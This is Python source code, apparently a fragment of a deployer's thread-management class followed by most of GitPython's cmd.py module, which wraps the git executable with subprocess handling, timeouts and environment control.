self.notifier.dispatch(notification.Notification.deployer_started())
def _start_worker(self, worker, *args, **kwargs):
t = threading.Thread(name=worker.name,
target=self._restart_function_on_exception(
worker.start,
context="in worker {}".format(worker.name)
),
args=args,
kwargs=kwargs)
self.threads.append((t, worker))
t.start()
logger.debug("Started worker {} (tid {})".format(worker.name, t.ident))
def exit(self):
logger.info("Stopping the deployer (this can take a few seconds)...")
self._running = False
def _exit(self):
with self.lock:
self._running = False
timeout = 10
for t, worker in self.threads:
try:
logger.debug("Stopping worker {} (tid {})".format(worker.name, t.ident))
worker.stop()
except Exception:
logger.exception("Error when stopping the worker {}:".format(worker.name))
for t, worker in self.threads:
logger.debug("Waiting for the worker {} to exit (tid {})...".format(worker.name, t.ident))
t.join(timeout)
still_alive = [t for t, _ in self.threads if t.isAlive()]
if len(still_alive) > 0: # this was not a triumph
for t in still_alive:
logger.error("The thread '{}' is still alive after {} seconds (maybe because of a deployment in progress?). If you want to force the exit, send SIGKILL to the deployer process.".format(t.name, timeout))
else:
logger.info("All workers gracefully terminated.")
self.threads = []
def _monitor(self):
while self._running:
with self.lock:
for t, _ in self.threads:
if not t.isAlive():
self._health.add_degraded("workers", "a deployer thread died (see logs for details)")
logger.error(
"The thread {} (tid {}) died. You should examine the logs to find out "
"what went wrong, and probably restart the deployer."
.format(t.name, t.ident))
time.sleep(20)
|
cmd.py
|
# cmd.py
# Copyright (C) 2008, 2009 Michael Trier (mtrier@gmail.com) and contributors
#
# This module is part of GitPython and is released under
# the BSD License: http://www.opensource.org/licenses/bsd-license.php
from __future__ import annotations
from contextlib import contextmanager
import io
import logging
import os
import signal
from subprocess import call, Popen, PIPE, DEVNULL
import subprocess
import threading
from textwrap import dedent
from git.compat import (
defenc,
force_bytes,
safe_decode,
is_posix,
is_win,
)
from git.exc import CommandError
from git.util import is_cygwin_git, cygpath, expand_path, remove_password_if_present
from .exc import GitCommandError, GitCommandNotFound
from .util import (
LazyMixin,
stream_copy,
)
# typing ---------------------------------------------------------------------------
from typing import (
Any,
AnyStr,
BinaryIO,
Callable,
Dict,
IO,
Iterator,
List,
Mapping,
Sequence,
TYPE_CHECKING,
TextIO,
Tuple,
Union,
cast,
overload,
)
from git.types import PathLike, Literal, TBD
if TYPE_CHECKING:
from git.repo.base import Repo
from git.diff import DiffIndex
# ---------------------------------------------------------------------------------
execute_kwargs = {
"istream",
"with_extended_output",
"with_exceptions",
"as_process",
"stdout_as_string",
"output_stream",
"with_stdout",
"kill_after_timeout",
"universal_newlines",
"shell",
"env",
"max_chunk_size",
"strip_newline_in_stdout",
}
log = logging.getLogger(__name__)
log.addHandler(logging.NullHandler())
__all__ = ("Git",)
# ==============================================================================
## @name Utilities
# ------------------------------------------------------------------------------
# Documentation
## @{
def handle_process_output(
process: "Git.AutoInterrupt" | Popen,
stdout_handler: Union[
None,
Callable[[AnyStr], None],
Callable[[List[AnyStr]], None],
Callable[[bytes, "Repo", "DiffIndex"], None],
],
stderr_handler: Union[None, Callable[[AnyStr], None], Callable[[List[AnyStr]], None]],
finalizer: Union[None, Callable[[Union[subprocess.Popen, "Git.AutoInterrupt"]], None]] = None,
decode_streams: bool = True,
kill_after_timeout: Union[None, float] = None,
) -> None:
"""Registers for notifications to learn that process output is ready to read, and dispatches lines to
the respective line handlers.
This function returns once the finalizer returns
:return: result of finalizer
:param process: subprocess.Popen instance
:param stdout_handler: f(stdout_line_string), or None
:param stderr_handler: f(stderr_line_string), or None
:param finalizer: f(proc) - wait for proc to finish
:param decode_streams:
Assume stdout/stderr streams are binary and decode them before pushing \
their contents to handlers.
Set it to False if `universal_newline == True` (then streams are in text-mode)
or if decoding must happen later (i.e. for Diffs).
:param kill_after_timeout:
float or None, Default = None
To specify a timeout in seconds for the git command, after which the process
should be killed.
"""
# Use 2 "pump" threads and wait for both to finish.
def pump_stream(
cmdline: List[str],
name: str,
stream: Union[BinaryIO, TextIO],
is_decode: bool,
handler: Union[None, Callable[[Union[bytes, str]], None]],
) -> None:
try:
for line in stream:
if handler:
if is_decode:
assert isinstance(line, bytes)
line_str = line.decode(defenc)
handler(line_str)
else:
handler(line)
except Exception as ex:
log.error(f"Pumping {name!r} of cmd({remove_password_if_present(cmdline)}) failed due to: {ex!r}")
if "I/O operation on closed file" not in str(ex):
# Only reraise if the error was not due to the stream closing
raise CommandError([f"<{name}-pump>"] + remove_password_if_present(cmdline), ex) from ex
finally:
stream.close()
if hasattr(process, "proc"):
process = cast("Git.AutoInterrupt", process)
cmdline: str | Tuple[str, ...] | List[str] = getattr(process.proc, "args", "")
p_stdout = process.proc.stdout if process.proc else None
p_stderr = process.proc.stderr if process.proc else None
else:
process = cast(Popen, process)
cmdline = getattr(process, "args", "")
p_stdout = process.stdout
p_stderr = process.stderr
if not isinstance(cmdline, (tuple, list)):
cmdline = cmdline.split()
pumps: List[Tuple[str, IO, Callable[..., None] | None]] = []
if p_stdout:
pumps.append(("stdout", p_stdout, stdout_handler))
if p_stderr:
pumps.append(("stderr", p_stderr, stderr_handler))
threads: List[threading.Thread] = []
for name, stream, handler in pumps:
t = threading.Thread(target=pump_stream, args=(cmdline, name, stream, decode_streams, handler))
t.daemon = True
t.start()
threads.append(t)
## FIXME: Why Join?? Will block if `stdin` needs feeding...
#
for t in threads:
t.join(timeout=kill_after_timeout)
if t.is_alive():
if isinstance(process, Git.AutoInterrupt):
process._terminate()
else: # Don't want to deal with the other case
raise RuntimeError(
"Thread join() timed out in cmd.handle_process_output()."
f" kill_after_timeout={kill_after_timeout} seconds"
)
if stderr_handler:
error_str: Union[str, bytes] = (
"error: process killed because it timed out." f" kill_after_timeout={kill_after_timeout} seconds"
)
if not decode_streams and isinstance(p_stderr, BinaryIO):
# Assume stderr_handler needs binary input
error_str = cast(str, error_str)
error_str = error_str.encode()
# We ignore typing on the next line because mypy does not like
# the way we inferred that stderr takes str or bytes
stderr_handler(error_str) # type: ignore
if finalizer:
return finalizer(process)
else:
return None
def dashify(string: str) -> str:
return string.replace("_", "-")
def slots_to_dict(self: object, exclude: Sequence[str] = ()) -> Dict[str, Any]:
return {s: getattr(self, s) for s in self.__slots__ if s not in exclude}
def dict_to_slots_and__excluded_are_none(self: object, d: Mapping[str, Any], excluded: Sequence[str] = ()) -> None:
for k, v in d.items():
setattr(self, k, v)
for k in excluded:
setattr(self, k, None)
## -- End Utilities -- @}
# value of Windows process creation flag taken from MSDN
CREATE_NO_WINDOW = 0x08000000
## CREATE_NEW_PROCESS_GROUP is needed to allow killing it afterwards,
# see https://docs.python.org/3/library/subprocess.html#subprocess.Popen.send_signal
PROC_CREATIONFLAGS = (
CREATE_NO_WINDOW | subprocess.CREATE_NEW_PROCESS_GROUP if is_win else 0 # type: ignore[attr-defined]
) # mypy error if not windows
class Git(LazyMixin):
"""
The Git class manages communication with the Git binary.
It provides a convenient interface to calling the Git binary, such as in::
g = Git( git_dir )
g.init() # calls 'git init' program
rval = g.ls_files() # calls 'git ls-files' program
``Debugging``
Set the GIT_PYTHON_TRACE environment variable print each invocation
of the command to stdout.
Set its value to 'full' to see details about the returned values.
"""
__slots__ = (
"_working_dir",
"cat_file_all",
"cat_file_header",
"_version_info",
"_git_options",
"_persistent_git_options",
"_environment",
)
_excluded_ = ("cat_file_all", "cat_file_header", "_version_info")
def __getstate__(self) -> Dict[str, Any]:
return slots_to_dict(self, exclude=self._excluded_)
def __setstate__(self, d: Dict[str, Any]) -> None:
dict_to_slots_and__excluded_are_none(self, d, excluded=self._excluded_)
# CONFIGURATION
git_exec_name = "git" # default that should work on linux and windows
# Enables debugging of GitPython's git commands
GIT_PYTHON_TRACE = os.environ.get("GIT_PYTHON_TRACE", False)
# If True, a shell will be used when executing git commands.
# This should only be desirable on Windows, see https://github.com/gitpython-developers/GitPython/pull/126
# and check `git/test_repo.py:TestRepo.test_untracked_files()` TC for an example where it is required.
# Override this value using `Git.USE_SHELL = True`
USE_SHELL = False
# Provide the full path to the git executable. Otherwise it assumes git is in the path
_git_exec_env_var = "GIT_PYTHON_GIT_EXECUTABLE"
_refresh_env_var = "GIT_PYTHON_REFRESH"
GIT_PYTHON_GIT_EXECUTABLE = None
# note that the git executable is actually found during the refresh step in
# the top level __init__
@classmethod
def refresh(cls, path: Union[None, PathLike] = None) -> bool:
"""This gets called by the refresh function (see the top level
__init__).
"""
# discern which path to refresh with
if path is not None:
new_git = os.path.expanduser(path)
new_git = os.path.abspath(new_git)
else:
new_git = os.environ.get(cls._git_exec_env_var, cls.git_exec_name)
# keep track of the old and new git executable path
old_git = cls.GIT_PYTHON_GIT_EXECUTABLE
cls.GIT_PYTHON_GIT_EXECUTABLE = new_git
# test if the new git executable path is valid
# - a GitCommandNotFound error is spawned by ourselves
# - a PermissionError is spawned if the git executable provided
# cannot be executed for whatever reason
has_git = False
try:
cls().version()
has_git = True
except (GitCommandNotFound, PermissionError):
pass
# warn or raise exception if test failed
if not has_git:
err = (
dedent(
"""\
Bad git executable.
The git executable must be specified in one of the following ways:
- be included in your $PATH
- be set via $%s
- explicitly set via git.refresh()
"""
)
% cls._git_exec_env_var
)
# revert to whatever the old_git was
cls.GIT_PYTHON_GIT_EXECUTABLE = old_git
if old_git is None:
# on the first refresh (when GIT_PYTHON_GIT_EXECUTABLE is
# None) we only are quiet, warn, or error depending on the
# GIT_PYTHON_REFRESH value
# determine what the user wants to happen during the initial
# refresh we expect GIT_PYTHON_REFRESH to either be unset or
# be one of the following values:
# 0|q|quiet|s|silence
# 1|w|warn|warning
# 2|r|raise|e|error
mode = os.environ.get(cls._refresh_env_var, "raise").lower()
quiet = ["quiet", "q", "silence", "s", "none", "n", "0"]
warn = ["warn", "w", "warning", "1"]
error = ["error", "e", "raise", "r", "2"]
if mode in quiet:
pass
elif mode in warn or mode in error:
err = (
dedent(
"""\
%s
All git commands will error until this is rectified.
This initial warning can be silenced or aggravated in the future by setting the
$%s environment variable. Use one of the following values:
- %s: for no warning or exception
- %s: for a printed warning
- %s: for a raised exception
Example:
export %s=%s
"""
)
% (
err,
cls._refresh_env_var,
"|".join(quiet),
"|".join(warn),
"|".join(error),
cls._refresh_env_var,
quiet[0],
)
)
if mode in warn:
print("WARNING: %s" % err)
else:
raise ImportError(err)
else:
err = (
dedent(
"""\
%s environment variable has been set but it has been set with an invalid value.
Use only the following values:
- %s: for no warning or exception
- %s: for a printed warning
- %s: for a raised exception
"""
)
% (
cls._refresh_env_var,
"|".join(quiet),
"|".join(warn),
"|".join(error),
)
)
raise ImportError(err)
# we get here if this was the init refresh and the refresh mode
# was not error, go ahead and set the GIT_PYTHON_GIT_EXECUTABLE
# such that we discern the difference between a first import
# and a second import
cls.GIT_PYTHON_GIT_EXECUTABLE = cls.git_exec_name
else:
# after the first refresh (when GIT_PYTHON_GIT_EXECUTABLE
# is no longer None) we raise an exception
raise GitCommandNotFound("git", err)
return has_git
@classmethod
def is_cygwin(cls) -> bool:
return is_cygwin_git(cls.GIT_PYTHON_GIT_EXECUTABLE)
@overload
@classmethod
def polish_url(cls, url: str, is_cygwin: Literal[False] = ...) -> str:
...
@overload
@classmethod
def polish_url(cls, url: str, is_cygwin: Union[None, bool] = None) -> str:
...
@classmethod
def polish_url(cls, url: str, is_cygwin: Union[None, bool] = None) -> PathLike:
if is_cygwin is None:
is_cygwin = cls.is_cygwin()
if is_cygwin:
url = cygpath(url)
else:
"""Remove any backslahes from urls to be written in config files.
Windows might create config-files containing paths with backslashed,
but git stops liking them as it will escape the backslashes.
Hence we undo the escaping just to be sure.
"""
url = os.path.expandvars(url)
if url.startswith("~"):
url = os.path.expanduser(url)
url = url.replace("\\\\", "\\").replace("\\", "/")
return url
class AutoInterrupt(object):
"""Kill/Interrupt the stored process instance once this instance goes out of scope. It is
used to prevent processes piling up in case iterators stop reading.
Besides all attributes are wired through to the contained process object.
The wait method was overridden to perform automatic status code checking
and possibly raise."""
__slots__ = ("proc", "args", "status")
# If this is non-zero it will override any status code during
# _terminate, used to prevent race conditions in testing
_status_code_if_terminate: int = 0
def __init__(self, proc: Union[None, subprocess.Popen], args: Any) -> None:
self.proc = proc
self.args = args
self.status: Union[int, None] = None
def _terminate(self) -> None:
"""Terminate the underlying process"""
if self.proc is None:
return
proc = self.proc
self.proc = None
if proc.stdin:
proc.stdin.close()
if proc.stdout:
proc.stdout.close()
if proc.stderr:
proc.stderr.close()
# did the process finish already so we have a return code ?
try:
if proc.poll() is not None:
self.status = self._status_code_if_terminate or proc.poll()
return None
except OSError as ex:
log.info("Ignored error after process had died: %r", ex)
# can be that nothing really exists anymore ...
if os is None or getattr(os, "kill", None) is None:
return None
# try to kill it
try:
proc.terminate()
status = proc.wait() # ensure process goes away
self.status = self._status_code_if_terminate or status
except OSError as ex:
log.info("Ignored error after process had died: %r", ex)
except AttributeError:
# try windows
# for some reason, providing None for stdout/stderr still prints something. This is why
# we simply use the shell and redirect to nul. Its slower than CreateProcess, question
# is whether we really want to see all these messages. Its annoying no matter what.
if is_win:
call(
("TASKKILL /F /T /PID %s 2>nul 1>nul" % str(proc.pid)),
shell=True,
)
# END exception handling
def __del__(self) -> None:
self._terminate()
def __getattr__(self, attr: str) -> Any:
return getattr(self.proc, attr)
# TODO: Bad choice to mimic `proc.wait()` but with different args.
def wait(self, stderr: Union[None, str, bytes] = b"") -> int:
"""Wait for the process and return its status code.
:param stderr: Previously read value of stderr, in case stderr is already closed.
:warn: may deadlock if output or error pipes are used and not handled separately.
:raise GitCommandError: if the return status is not 0"""
if stderr is None:
stderr_b = b""
stderr_b = force_bytes(data=stderr, encoding="utf-8")
status: Union[int, None]
if self.proc is not None:
status = self.proc.wait()
p_stderr = self.proc.stderr
else: # Assume the underlying proc was killed earlier or never existed
status = self.status
p_stderr = None
def read_all_from_possibly_closed_stream(stream: Union[IO[bytes], None]) -> bytes:
if stream:
try:
return stderr_b + force_bytes(stream.read())
except ValueError:
return stderr_b or b""
else:
return stderr_b or b""
# END status handling
if status != 0:
errstr = read_all_from_possibly_closed_stream(p_stderr)
log.debug("AutoInterrupt wait stderr: %r" % (errstr,))
raise GitCommandError(remove_password_if_present(self.args), status, errstr)
return status
# END auto interrupt
class CatFileContentStream(object):
"""Object representing a sized read-only stream returning the contents of
an object.
It behaves like a stream, but counts the data read and simulates an empty
stream once our sized content region is empty.
If not all data is read to the end of the objects's lifetime, we read the
rest to assure the underlying stream continues to work"""
__slots__: Tuple[str, ...] = ("_stream", "_nbr", "_size")
def __init__(self, size: int, stream: IO[bytes]) -> None:
self._stream = stream
self._size = size
self._nbr = 0 # num bytes read
# special case: if the object is empty, has null bytes, get the
# final newline right away.
if size == 0:
stream.read(1)
# END handle empty streams
def read(self, size: int = -1) -> bytes:
bytes_left = self._size - self._nbr
if bytes_left == 0:
return b""
if size > -1:
# assure we don't try to read past our limit
size = min(bytes_left, size)
else:
# they try to read all, make sure its not more than what remains
size = bytes_left
# END check early depletion
data = self._stream.read(size)
self._nbr += len(data)
# check for depletion, read our final byte to make the stream usable by others
if self._size - self._nbr == 0:
self._stream.read(1) # final newline
# END finish reading
return data
def readline(self, size: int = -1) -> bytes:
if self._nbr == self._size:
return b""
# clamp size to lowest allowed value
bytes_left = self._size - self._nbr
if size > -1:
size = min(bytes_left, size)
else:
size = bytes_left
# END handle size
data = self._stream.readline(size)
self._nbr += len(data)
# handle final byte
if self._size - self._nbr == 0:
self._stream.read(1)
# END finish reading
return data
def readlines(self, size: int = -1) -> List[bytes]:
if self._nbr == self._size:
return []
# leave all additional logic to our readline method, we just check the size
out = []
nbr = 0
while True:
line = self.readline()
if not line:
break
out.append(line)
if size > -1:
nbr += len(line)
if nbr > size:
break
# END handle size constraint
# END readline loop
return out
# skipcq: PYL-E0301
def __iter__(self) -> "Git.CatFileContentStream":
return self
def __next__(self) -> bytes:
return next(self)
def next(self) -> bytes:
line = self.readline()
if not line:
raise StopIteration
return line
def __del__(self) -> None:
bytes_left = self._size - self._nbr
if bytes_left:
# read and discard - seeking is impossible within a stream
# includes terminating newline
self._stream.read(bytes_left + 1)
# END handle incomplete read
def __init__(self, working_dir: Union[None, PathLike] = None):
"""Initialize this instance with:
:param working_dir:
Git directory we should work in. If None, we always work in the current
directory as returned by os.getcwd().
It is meant to be the working tree directory if available, or the
.git directory in case of bare repositories."""
super(Git, self).__init__()
self._working_dir = expand_path(working_dir)
self._git_options: Union[List[str], Tuple[str, ...]] = ()
self._persistent_git_options: List[str] = []
# Extra environment variables to pass to git commands
self._environment: Dict[str, str] = {}
# cached command slots
self.cat_file_header: Union[None, TBD] = None
self.cat_file_all: Union[None, TBD] = None
def __getattr__(self, name: str) -> Any:
"""A convenience method as it allows to call the command as if it was
an object.
:return: Callable object that will execute call _call_process with your arguments."""
if name[0] == "_":
return LazyMixin.__getattr__(self, name)
return lambda *args, **kwargs: self._call_process(name, *args, **kwargs)
def set_persistent_git_options(self, **kwargs: Any) -> None:
"""Specify command line options to the git executable
for subsequent subcommand calls
:param kwargs:
is a dict of keyword arguments.
these arguments are passed as in _call_process
but will be passed to the git command rather than
the subcommand.
"""
self._persistent_git_options = self.transform_kwargs(split_single_char_options=True, **kwargs)
def _set_cache_(self, attr: str) -> None:
if attr == "_version_info":
# We only use the first 4 numbers, as everything else could be strings in fact (on windows)
process_version = self._call_process("version") # should be as default *args and **kwargs used
version_numbers = process_version.split(" ")[2]
self._version_info = cast(
Tuple[int, int, int, int],
tuple(int(n) for n in version_numbers.split(".")[:4] if n.isdigit()),
)
else:
super(Git, self)._set_cache_(attr)
# END handle version info
@property
def working_dir(self) -> Union[None, PathLike]:
""":return: Git directory we are working on"""
return self._working_dir
@property
def version_info(self) -> Tuple[int, int, int, int]:
"""
:return: tuple(int, int, int, int) tuple with integers representing the major, minor
and additional version numbers as parsed from git version.
This value is generated on demand and is cached"""
return self._version_info
@overload
def execute(self, command: Union[str, Sequence[Any]], *, as_process: Literal[True]) -> "AutoInterrupt":
...
@overload
def execute(
self,
command: Union[str, Sequence[Any]],
*,
as_process: Literal[False] = False,
stdout_as_string: Literal[True],
) -> Union[str, Tuple[int, str, str]]:
...
@overload
def execute(
self,
command: Union[str, Sequence[Any]],
*,
as_process: Literal[False] = False,
stdout_as_string: Literal[False] = False,
) -> Union[bytes, Tuple[int, bytes, str]]:
...
@overload
def execute(
self,
command: Union[str, Sequence[Any]],
*,
with_extended_output: Literal[False],
as_process: Literal[False],
stdout_as_string: Literal[True],
) -> str:
...
@overload
def execute(
self,
command: Union[str, Sequence[Any]],
*,
with_extended_output: Literal[False],
as_process: Literal[False],
stdout_as_string: Literal[False],
) -> bytes:
...
def execute(
self,
command: Union[str, Sequence[Any]],
istream: Union[None, BinaryIO] = None,
with_extended_output: bool = False,
with_exceptions: bool = True,
as_process: bool = False,
output_stream: Union[None, BinaryIO] = None,
stdout_as_string: bool = True,
kill_after_timeout: Union[None, float] = None,
with_stdout: bool = True,
universal_newlines: bool = False,
shell: Union[None, bool] = None,
env: Union[None, Mapping[str, str]] = None,
max_chunk_size: int = io.DEFAULT_BUFFER_SIZE,
strip_newline_in_stdout: bool = True,
**subprocess_kwargs: Any,
) -> Union[str, bytes, Tuple[int, Union[str, bytes], str], AutoInterrupt]:
"""Handles executing the command on the shell and consumes and returns
the returned information (stdout)
:param command:
The command argument list to execute.
It should be a string, or a sequence of program arguments. The
program to execute is the first item in the args sequence or string.
:param istream:
Standard input filehandle passed to subprocess.Popen.
:param with_extended_output:
Whether to return a (status, stdout, stderr) tuple.
:param with_exceptions:
Whether to raise an exception when git returns a non-zero status.
:param as_process:
Whether to return the created process instance directly from which
streams can be read on demand. This will render with_extended_output and
with_exceptions ineffective - the caller will have
to deal with the details himself.
It is important to note that the process will be placed into an AutoInterrupt
wrapper that will interrupt the process once it goes out of scope. If you
use the command in iterators, you should pass the whole process instance
instead of a single stream.
:param output_stream:
If set to a file-like object, data produced by the git command will be
output to the given stream directly.
This feature only has any effect if as_process is False. Processes will
always be created with a pipe due to issues with subprocess.
This merely is a workaround as data will be copied from the
output pipe to the given output stream directly.
Judging from the implementation, you shouldn't use this flag !
:param stdout_as_string:
if False, the commands standard output will be bytes. Otherwise, it will be
decoded into a string using the default encoding (usually utf-8).
The latter can fail, if the output contains binary data.
:param env:
A dictionary of environment variables to be passed to `subprocess.Popen`.
:param max_chunk_size:
Maximum number of bytes in one chunk of data passed to the output_stream in
one invocation of write() method. If the given number is not positive then
the default value is used.
:param subprocess_kwargs:
Keyword arguments to be passed to subprocess.Popen. Please note that
some of the valid kwargs are already set by this method, the ones you
specify may not be the same ones.
:param with_stdout: If True, default True, we open stdout on the created process
:param universal_newlines:
if True, pipes will be opened as text, and lines are split at
all known line endings.
:param shell:
Whether to invoke commands through a shell (see `Popen(..., shell=True)`).
It overrides :attr:`USE_SHELL` if it is not `None`.
:param kill_after_timeout:
To specify a timeout in seconds for the git command, after which the process
should be killed. This will have no effect if as_process is set to True. It is
set to None by default and will let the process run until the timeout is
explicitly specified. This feature is not supported on Windows. It's also worth
noting that kill_after_timeout uses SIGKILL, which can have negative side
effects on a repository. For example, stale locks in case of git gc could
render the repository incapable of accepting changes until the lock is manually
removed.
:param strip_newline_in_stdout:
Whether to strip the trailing `\n` of the command stdout.
:return:
* str(output) if extended_output = False (Default)
* tuple(int(status), str(stdout), str(stderr)) if extended_output = True
if output_stream is True, the stdout value will be your output stream:
* output_stream if extended_output = False
* tuple(int(status), output_stream, str(stderr)) if extended_output = True
Note git is executed with LC_MESSAGES="C" to ensure consistent
output regardless of system language.
:raise GitCommandError:
:note:
If you add additional keyword arguments to the signature of this method,
you must update the execute_kwargs tuple housed in this module."""
# Remove password for the command if present
redacted_command = remove_password_if_present(command)
if self.GIT_PYTHON_TRACE and (self.GIT_PYTHON_TRACE != "full" or as_process):
log.info(" ".join(redacted_command))
# Allow the user to have the command executed in their working dir.
try:
cwd = self._working_dir or os.getcwd() # type: Union[None, str]
if not os.access(str(cwd), os.X_OK):
cwd = None
except FileNotFoundError:
cwd = None
# Start the process
inline_env = env
env = os.environ.copy()
# Attempt to force all output to plain ascii english, which is what some parsing code
# may expect.
# According to stackoverflow (http://goo.gl/l74GC8), we are setting LANGUAGE as well
# just to be sure.
env["LANGUAGE"] = "C"
env["LC_ALL"] = "C"
env.update(self._environment)
if inline_env is not None:
env.update(inline_env)
if is_win:
cmd_not_found_exception = OSError
if kill_after_timeout is not None:
raise GitCommandError(
redacted_command,
'"kill_after_timeout" feature is not supported on Windows.',
)
else:
cmd_not_found_exception = FileNotFoundError # NOQA # exists, flake8 unknown @UndefinedVariable
# end handle
stdout_sink = PIPE if with_stdout else getattr(subprocess, "DEVNULL", None) or open(os.devnull, "wb")
istream_ok = "None"
if istream:
istream_ok = "<valid stream>"
log.debug(
"Popen(%s, cwd=%s, universal_newlines=%s, shell=%s, istream=%s)",
redacted_command,
cwd,
universal_newlines,
shell,
istream_ok,
)
try:
proc = Popen(
command,
env=env,
cwd=cwd,
bufsize=-1,
stdin=istream or DEVNULL,
stderr=PIPE,
stdout=stdout_sink,
shell=shell is not None and shell or self.USE_SHELL,
close_fds=is_posix, # unsupported on windows
universal_newlines=universal_newlines,
creationflags=PROC_CREATIONFLAGS,
**subprocess_kwargs,
)
except cmd_not_found_exception as err:
raise GitCommandNotFound(redacted_command, err) from err
else:
# replace with a typeguard for Popen[bytes]?
proc.stdout = cast(BinaryIO, proc.stdout)
proc.stderr = cast(BinaryIO, proc.stderr)
if as_process:
return self.AutoInterrupt(proc, command)
def _kill_process(pid: int) -> None:
"""Callback method to kill a process."""
p = Popen(
["ps", "--ppid", str(pid)],
stdout=PIPE,
creationflags=PROC_CREATIONFLAGS,
)
child_pids = []
if p.stdout is not None:
for line in p.stdout:
if len(line.split()) > 0:
local_pid = (line.split())[0]
if local_pid.isdigit():
child_pids.append(int(local_pid))
try:
# Windows does not have SIGKILL, so use SIGTERM instead
sig = getattr(signal, "SIGKILL", signal.SIGTERM)
os.kill(pid, sig)
for child_pid in child_pids:
try:
os.kill(child_pid, sig)
except OSError:
pass
kill_check.set() # tell the main routine that the process was killed
except OSError:
# It is possible that the process gets completed in the duration after timeout
# happens and before we try to kill the process.
pass
return
# end
if kill_after_timeout is not None:
kill_check = threading.Event()
watchdog = threading.Timer(kill_after_timeout, _kill_process, args=(proc.pid,))
# Wait for the process to return
status = 0
stdout_value: Union[str, bytes] = b""
stderr_value: Union[str, bytes] = b""
newline = "\n" if universal_newlines else b"\n"
try:
if output_stream is None:
if kill_after_timeout is not None:
watchdog.start()
stdout_value, stderr_value = proc.communicate()
if kill_after_timeout is not None:
watchdog.cancel()
if kill_check.is_set():
stderr_value = 'Timeout: the command "%s" did not complete in %d ' "secs." % (
" ".join(redacted_command),
kill_after_timeout,
)
if not universal_newlines:
stderr_value = stderr_value.encode(defenc)
# strip trailing "\n"
if stdout_value.endswith(newline) and strip_newline_in_stdout: # type: ignore
stdout_value = stdout_value[:-1]
if stderr_value.endswith(newline): # type: ignore
stderr_value = stderr_value[:-1]
status = proc.returncode
else:
max_chunk_size = max_chunk_size if max_chunk_size and max_chunk_size > 0 else io.DEFAULT_BUFFER_SIZE
stream_copy(proc.stdout, output_stream, max_chunk_size)
stdout_value = proc.stdout.read()
stderr_value = proc.stderr.read()
# strip trailing "\n"
if stderr_value.endswith(newline): # type: ignore
stderr_value = stderr_value[:-1]
status = proc.wait()
# END stdout handling
finally:
proc.stdout.close()
proc.stderr.close()
if self.GIT_PYTHON_TRACE == "full":
cmdstr = " ".join(redacted_command)
def as_text(stdout_value: Union[bytes, str]) -> str:
return not output_stream and safe_decode(stdout_value) or "<OUTPUT_STREAM>"
# end
if stderr_value:
log.info(
"%s -> %d; stdout: '%s'; stderr: '%s'",
cmdstr,
status,
as_text(stdout_value),
safe_decode(stderr_value),
)
elif stdout_value:
log.info("%s -> %d; stdout: '%s'", cmdstr, status, as_text(stdout_value))
else:
log.info("%s -> %d", cmdstr, status)
# END handle debug printing
if with_exceptions and status != 0:
raise GitCommandError(redacted_command, status, stderr_value, stdout_value)
if isinstance(stdout_value, bytes) and stdout_as_string: # could also be output_stream
stdout_value = safe_decode(stdout_value)
# Allow access to the command's status code
if with_extended_output:
return (status, stdout_value, safe_decode(stderr_value))
else:
return stdout_value
def environment(self) -> Dict[str, str]:
return self._environment
def update_environment(self, **kwargs: Any) -> Dict[str, Union[str, None]]:
"""
Set environment variables for future git invocations. Return all changed
values in a format that can be passed back into this function to revert
the changes:
``Examples``::
old_env = self.update_environment(PWD='/tmp')
self.update_environment(**old_env)
:param kwargs: environment variables to use for git processes
:return: dict that maps environment variables to their old values
"""
old_env = {}
for key, value in kwargs.items():
# set value if it is None
if value is not None:
old_env[key] = self._environment.get(key)
self._environment[key] = value
# remove key from environment if its value is None
elif key in self._environment:
old_env[key] = self._environment[key]
del self._environment[key]
return old_env
@contextmanager
def custom_environment(self, **kwargs: Any) -> Iterator[None]:
"""
A context manager around the above ``update_environment`` method to restore the
environment back to its previous state after operation.
``Examples``::
with self.custom_environment(GIT_SSH='/bin/ssh_wrapper'):
repo.remotes.origin.fetch()
:param kwargs: see update_environment
"""
old_env = self.update_environment(**kwargs)
try:
yield
finally:
self.update_environment(**old_env)
def transform_kwarg(self, name: str, value: Any, split_single_char_options: bool) -> List[str]:
if len(name) == 1:
if value is True:
return ["-%s" % name]
elif value not in (False, None):
if split_single_char_options:
return ["-%s" % name, "%s" % value]
else:
return ["-%s%s" % (name, value)]
else:
if value is True:
return ["--%s" % dashify(name)]
elif value is not False and value is not None:
return ["--%s=%s" % (dashify(name), value)]
return []
def transform_kwargs(self, split_single_char_options: bool = True, **kwargs: Any) -> List[str]:
"""Transforms Python style kwargs into git command line options."""
args = []
for k, v in kwargs.items():
if isinstance(v, (list, tuple)):
for value in v:
args += self.transform_kwarg(k, value, split_single_char_options)
else:
args += self.transform_kwarg(k, v, split_single_char_options)
return args
@classmethod
def __unpack_args(cls, arg_list: Sequence[str]) -> List[str]:
outlist = []
if isinstance(arg_list, (list, tuple)):
for arg in arg_list:
outlist.extend(cls.__unpack_args(arg))
else:
outlist.append(str(arg_list))
return outlist
def __call__(self, **kwargs: Any) -> "Git":
"""Specify command line options to the git executable
for a subcommand call
:param kwargs:
is a dict of keyword arguments.
these arguments are passed as in _call_process
but will be passed to the git command rather than
the subcommand.
``Examples``::
git(work_tree='/tmp').difftool()"""
self._git_options = self.transform_kwargs(split_single_char_options=True, **kwargs)
return self
@overload
def _call_process(self, method: str, *args: None, **kwargs: None) -> str:
... # if no args given, execute called with all defaults
@overload
def _call_process(
self,
method: str,
istream: int,
as_process: Literal[True],
*args: Any,
**kwargs: Any,
) -> "Git.AutoInterrupt":
...
@overload
def _call_process(
self, method: str, *args: Any, **kwargs: Any
) -> Union[str, bytes, Tuple[int, Union[str, bytes], str], "Git.AutoInterrupt"]:
...
def _call_process(
self, method: str, *args: Any, **kwargs: Any
) -> Union[str, bytes, Tuple[int, Union[str, bytes], str], "Git.AutoInterrupt"]:
"""Run the given git command with the specified arguments and return
the result as a String
:param method:
is the command. Contained "_" characters will be converted to dashes,
such as in 'ls_files' to call 'ls-files'.
:param args:
is the list of arguments. If None is included, it will be pruned.
This allows your commands to call git more conveniently as None
is realized as non-existent
:param kwargs:
It contains key-values for the following:
- the :meth:`execute()` kwds, as listed in :var:`execute_kwargs`;
- "command options" to be converted by :meth:`transform_kwargs()`;
- the `'insert_kwargs_after'` key which its value must match one of ``*args``
and any cmd-options will be appended after the matched arg.
Examples::
git.rev_list('master', max_count=10, header=True)
turns into::
git rev-list max-count 10 --header master
:return: Same as ``execute``
if no args given used execute default (esp. as_process = False, stdout_as_string = True)
and return str"""
# Handle optional arguments prior to calling transform_kwargs
# otherwise these'll end up in args, which is bad.
